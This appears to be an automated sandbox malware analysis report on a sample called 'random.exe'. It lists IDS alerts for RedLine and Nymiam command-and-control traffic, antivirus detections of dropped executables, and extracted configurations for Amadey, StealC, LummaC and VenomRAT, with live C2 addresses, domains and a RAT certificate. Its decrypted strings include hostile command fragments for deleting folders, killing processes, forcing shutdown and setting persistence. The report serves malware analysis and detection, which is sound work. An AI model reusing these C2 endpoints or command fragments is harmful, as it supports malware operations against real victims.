2025-02-07T17:59:27.405772+0100	2803305	3	Unknown Traffic	192.168.2.8	49722	185.215.113.16	80	TCP
2025-02-07T17:59:33.283175+0100	2803305	3	Unknown Traffic	192.168.2.8	49729	185.215.113.16	80	TCP
2025-02-07T17:59:38.949575+0100	2803305	3	Unknown Traffic	192.168.2.8	49734	185.215.113.16	80	TCP
2025-02-07T17:59:44.072932+0100	2803305	3	Unknown Traffic	192.168.2.8	49740	185.215.113.16	80	TCP
2025-02-07T17:59:49.313853+0100	2803305	3	Unknown Traffic	192.168.2.8	49746	185.215.113.97	80	TCP
2025-02-07T17:59:59.458925+0100	2803305	3	Unknown Traffic	192.168.2.8	49756	185.215.113.97	80	TCP
2025-02-07T18:01:51.775834+0100	2803305	3	Unknown Traffic	192.168.2.8	56474	185.215.113.97	80	TCP

ETPRO MALWARE RedLine - CheckConnect Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:59:29.485216+0100	2849662	1	Malware Command and Control Activity Detected	192.168.2.8	49724	103.84.89.222	33791	TCP

ETPRO MALWARE RedLine - EnvironmentSettings Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:59:38.688058+0100	2849351	1	Malware Command and Control Activity Detected	192.168.2.8	49724	103.84.89.222	33791	TCP

ETPRO MALWARE RedLine - GetUpdates Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T18:00:12.866235+0100	2848200	1	Malware Command and Control Activity Detected	192.168.2.8	49785	103.84.89.222	33791	TCP

ETPRO MALWARE RedLine - SetEnvironment Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T18:00:06.991196+0100	2849352	1	Malware Command and Control Activity Detected	192.168.2.8	49771	103.84.89.222	33791	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T18:00:32.260082+0100	2843864	1	A Network Trojan was detected	192.168.2.8	49852	188.114.96.3	443	TCP

Joe Security MALWARE Nymiam - C&C DLL Download Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T18:00:07.182399+0100	1800003	1	Malware Command and Control Activity Detected	192.168.2.8	49767	185.156.73.23	80	TCP
2025-02-07T18:02:34.906898+0100	1800003	1	Malware Command and Control Activity Detected	192.168.2.8	56482	185.156.73.23	80	TCP

Joe Security MALWARE Nymiam - C&C DLL Key Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T18:00:06.802744+0100	1800002	1	Malware Command and Control Activity Detected	192.168.2.8	49767	185.156.73.23	80	TCP
2025-02-07T18:02:34.543584+0100	1800002	1	Malware Command and Control Activity Detected	192.168.2.8	56482	185.156.73.23	80	TCP

Joe Security MALWARE Nymiam - C&C Files Download Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T18:00:07.800414+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49767	185.156.73.23	80	TCP
2025-02-07T18:00:10.151308+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49767	185.156.73.23	80	TCP
2025-02-07T18:00:13.239580+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49787	185.156.73.23	80	TCP
2025-02-07T18:00:16.418595+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49792	185.156.73.23	80	TCP
2025-02-07T18:00:19.240771+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49797	185.156.73.23	80	TCP
2025-02-07T18:00:22.372007+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49802	185.156.73.23	80	TCP
2025-02-07T18:00:25.281549+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49807	185.156.73.23	80	TCP
2025-02-07T18:00:28.328139+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49814	185.156.73.23	80	TCP
2025-02-07T18:00:31.321198+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49840	185.156.73.23	80	TCP
2025-02-07T18:00:34.096803+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49855	185.156.73.23	80	TCP
2025-02-07T18:00:36.898157+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49861	185.156.73.23	80	TCP
2025-02-07T18:02:35.396650+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	56482	185.156.73.23	80	TCP
2025-02-07T18:02:37.695989+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	56482	185.156.73.23	80	TCP

Joe Security MALWARE Nymiam - C&C Software Download Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T18:00:41.183490+0100	1800005	1	Malware Command and Control Activity Detected	192.168.2.8	49864	185.156.73.23	80	TCP
2025-02-07T18:00:42.585607+0100	1800005	1	Malware Command and Control Activity Detected	192.168.2.8	49866	185.156.73.23	80	TCP

Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-07T17:59:29.485216+0100	1800000	1	Malware Command and Control Activity Detected	192.168.2.8	49724	103.84.89.222	33791	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\GEMLK2N3PIGIX28D6T21H.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\680165SXWLIPNFUG.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe	Avira: detection malicious, Label: TR/ATRAPS.Gen

Found malware configuration

Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000019.00000002.2527448311.000000000153E000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.115/c4becf79229cb002.php"}
Source: 0000003A.00000002.2843999557.0000000003469000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: LummaC {"C2 url": ["paleboreei.biz", "importenptoc.com", "voicesharped.com", "inputrreparnt.com", "torpdidebar.com", "rebeldettern.com", "actiothreaz.com", "garulouscuto.com", "breedertremnd.com"], "Build id": "RvTZB0--@install"}
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack	Malware Configuration Extractor: VenomRAT {"Host": ["85.209.128.208"], "Port": ["4449"], "Version": "RAT + hVNC 6.0.6", "Install": "true", "Mutex": "wexcbaobhugblzgxijd", "Certificate": "MIICLjCCAZegAwIBAgIVAO9Z+p2DQtE+G26NILoKGuB/WQ/pMA0GCSqGSIb3DQEBDQUAMGIxFTATBgNVBAMMDFZlbm9tIFNlcnZlcjESMBAGA1UECwwJYWxleGVpa3VuMRswGQYDVQQKDBJWZW5vbSBCeSBhbGV4ZWlrdW4xCzAJBgNVBAcMAlNIMQswCQYDVQQGEwJDTjAeFw0yNDA0MjYxNjEzMjdaFw0zNTAyMDMxNjEzMjdaMBAxDjAMBgNVBAMMBVZlbm9tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCFNmZsFlC0Huh66ZtyYIjwPKHeeIlGN9Y9Otqm9xtlssUM9NkX+pZtitLXh2A1aB08rk79FNQN9GPa1u5Dtmr5yTNi7s3HLwN5g7RXzWUU0sKerIrPVjkHTKWBXysHWvPBdW+LAoPGaMoRNBwxHLaQAIOggaM4BbA6VMIexTPI3wIDAQABozIwMDAdBgNVHQ4EFgQUc7VXwFJ+WUL/Qv13lijwfriqzTcwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOBgQBb1Gtc2Fh4Ak9/N9K8TePvfcAyfC5itmGot+GapZal4lsD8NAKM8Qo7bWi5bx44tmBcxn3OzbTvk+JGtguxUQhodPQKBv2Sw0Lc8EVXnPLueLxlU18n3M/fpyl75YoiFDkMPV2EFaPrLUoL3af1XJ7ju6ZFDtzgaq49NUVZvR09A==", "Server Signature": "QeY1hnWAi6AJAPokZ5vkCF1hkVGgdVKo20iYLtYHaEUeEuFuA79XHT36+TMn4dXe1HZLs+qkGwv+5zobJzK2CRXhHFAjsW6hELnOCYFkshmrFJIcp/gnxz4/Fbs64dR8FUILwQIvzXz+nqNySImMp8T4pyfbfdq/G7gL6r3hcso="}
Source: 21.2.6d81c0d08d.exe.d10000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["103.84.89.222:33791"], "Bot Id": "cheat"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[3].exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[3].exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\GEMLK2N3PIGIX28D6T21H.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\tmpC752.tmp	ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: random.exe	Virustotal: Detection: 28%			Perma Link
Source: random.exe	ReversingLabs: Detection: 34%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\GEMLK2N3PIGIX28D6T21H.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[3].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1070078001\84b9c8b064.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\680165SXWLIPNFUG.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\TempCIL4SFAZBYC8WDZFYXIKTKERHSQQIXSV.EXE	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[3].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1070079001\48a23b3144.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1070076001\327981c77b.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1070080001\82ab3472d6.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: random.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: 185.215.113.43
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: /Zu7JuNko/index.php
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: S-%lu-
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: abc3bc1985
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: skotes.exe
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: Startup
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: rundll32
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: Programs
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: %USERPROFILE%
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: cred.dll
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: clip.dll
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: http://
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: https://
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: /quiet
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: /Plugins/
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: &unit=
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: shell32.dll
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: kernel32.dll
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: GetNativeSystemInfo
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: ProgramData\
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: AVAST Software
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: Kaspersky Lab
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: Panda Security
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: Doctor Web
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: 360TotalSecurity
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: Bitdefender
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: Norton
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: Sophos
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: Comodo
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: WinDefender
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: 0123456789
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: ------
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: ?scr=1
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: ComputerName
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: -unicode-
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: VideoID
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: DefaultSettings.XResolution
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: DefaultSettings.YResolution
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: ProductName
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: CurrentBuild
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: rundll32.exe
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: "taskkill /f /im "
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: " && timeout 1 && del
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: && Exit"
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: " && ren
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: Powershell.exe
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: shutdown -s -t 0
Source: 0000000C.00000002.1533140495.0000000000DE1000.00000040.00000001.01000000.0000000E.sdmp	String decryptor: random
Source: 0000003A.00000002.2843999557.0000000003469000.00000004.00000800.00020000.00000000.sdmp	String decryptor: paleboreei.biz
Source: 0000003A.00000002.2843999557.0000000003469000.00000004.00000800.00020000.00000000.sdmp	String decryptor: importenptoc.com
Source: 0000003A.00000002.2843999557.0000000003469000.00000004.00000800.00020000.00000000.sdmp	String decryptor: voicesharped.com
Source: 0000003A.00000002.2843999557.0000000003469000.00000004.00000800.00020000.00000000.sdmp	String decryptor: inputrreparnt.com
Source: 0000003A.00000002.2843999557.0000000003469000.00000004.00000800.00020000.00000000.sdmp	String decryptor: torpdidebar.com
Source: 0000003A.00000002.2843999557.0000000003469000.00000004.00000800.00020000.00000000.sdmp	String decryptor: rebeldettern.com
Source: 0000003A.00000002.2843999557.0000000003469000.00000004.00000800.00020000.00000000.sdmp	String decryptor: actiothreaz.com
Source: 0000003A.00000002.2843999557.0000000003469000.00000004.00000800.00020000.00000000.sdmp	String decryptor: garulouscuto.com
Source: 0000003A.00000002.2843999557.0000000003469000.00000004.00000800.00020000.00000000.sdmp	String decryptor: breedertremnd.com
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack	String decryptor: 4449
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack	String decryptor: 85.209.128.208
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack	String decryptor: RAT + hVNC 6.0.6
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack	String decryptor: true
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack	String decryptor: wexcbaobhugblzgxijd
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack	String decryptor: MIICLjCCAZegAwIBAgIVAO9Z+p2DQtE+G26NILoKGuB/WQ/pMA0GCSqGSIb3DQEBDQUAMGIxFTATBgNVBAMMDFZlbm9tIFNlcnZlcjESMBAGA1UECwwJYWxleGVpa3VuMRswGQYDVQQKDBJWZW5vbSBCeSBhbGV4ZWlrdW4xCzAJBgNVBAcMAlNIMQswCQYDVQQGEwJDTjAeFw0yNDA0MjYxNjEzMjdaFw0zNTAyMDMxNjEzMjdaMBAxDjAMBgNVBAMMBVZlbm9tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCFNmZsFlC0Huh66ZtyYIjwPKHeeIlGN9Y9Otqm9xtlssUM9NkX+pZtitLXh2A1aB08rk79FNQN9GPa1u5Dtmr5yTNi7s3HLwN5g7RXzWUU0sKerIrPVjkHTKWBXysHWvPBdW+LAoPGaMoRNBwxHLaQAIOggaM4BbA6VMIexTPI3wIDAQABozIwMDAdBgNVHQ4EFgQUc7VXwFJ+WUL/Qv13lijwfriqzTcwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOBgQBb1Gtc2Fh4Ak9/N9K8TePvfcAyfC5itmGot+GapZal4lsD8NAKM8Qo7bWi5bx44tmBcxn3OzbTvk+JGtguxUQhodPQKBv2Sw0Lc8EVXnPLueLxlU18n3M/fpyl75YoiFDkMPV2EFaPrLUoL3af1XJ7ju6ZFDtzgaq49NUVZvR09A==
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack	String decryptor: QeY1hnWAi6AJAPokZ5vkCF1hkVGgdVKo20iYLtYHaEUeEuFuA79XHT36+TMn4dXe1HZLs+qkGwv+5zobJzK2CRXhHFAjsW6hELnOCYFkshmrFJIcp/gnxz4/Fbs64dR8FUILwQIvzXz+nqNySImMp8T4pyfbfdq/G7gL6r3hcso=
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack	String decryptor: null
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack	String decryptor: false
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack	String decryptor: true
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack	String decryptor: Default
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack	String decryptor: true
Source: 54.2.48a23b3144.exe.4518570.2.raw.unpack	String decryptor: true

Phishing

Yara detected obfuscated html page

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\m5569IMo3.hta, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\7ETyHhWx5.hta, type: DROPPED

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.26.13.31:443 -> 192.168.2.8:49736 version: TLS 1.0

Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: unknown	HTTPS traffic detected: 104.21.0.135:443 -> 192.168.2.8:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.0.135:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.0.135:443 -> 192.168.2.8:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.0.135:443 -> 192.168.2.8:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.0.135:443 -> 192.168.2.8:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.0.135:443 -> 192.168.2.8:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.0.135:443 -> 192.168.2.8:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.0.135:443 -> 192.168.2.8:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49749 version: TLS 1.2
